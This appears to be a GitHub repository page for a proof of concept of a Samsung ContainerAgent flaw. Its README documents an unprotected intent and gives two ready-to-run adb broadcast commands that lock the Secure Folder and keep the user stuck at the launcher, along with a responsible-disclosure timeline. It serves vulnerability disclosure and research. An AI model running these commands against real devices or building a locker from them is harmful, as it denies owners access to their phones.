Skip to content

fs0c131y/SamsungLocker

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
app
 
 
 
 
 
 
 
 
 
 

Samsung ContainerAgent Vulnerability

Due to an unprotected intent in the ContainerAgent app, a Samsung smartphone can become temporarily bricked. This vulnerability can be used to create a Locker.

A write up has been published on Medium: https://medium.com/@fs0c131y/how-to-brick-all-samsung-phones-6aae4389bea?source=friends_link&sk=d044380dfde02c588fdab07d67720f2b

How To

Lock Secure folder

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1001 --ei "android.intent.extra.user_handle" 150

Go back to launcher

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1002 --ei "android.intent.extra.user_handle" 0

Result

The user will be stuck in the launcher and his Secure Folder will be locked all the time.

Disclosure

  • 04/02/19: Initial finding by @fs0c131y
  • 11/03/19: Responsible disclosure to the Samsung Security Team
  • 18/03/19: The Samsung Security Team considered this issue as no/little security impact

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

The investigation and the POC has been made with by @fs0c131y

About

Samsung ContainerAgent Vulnerability - Local DoS for Samsung smartphone

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages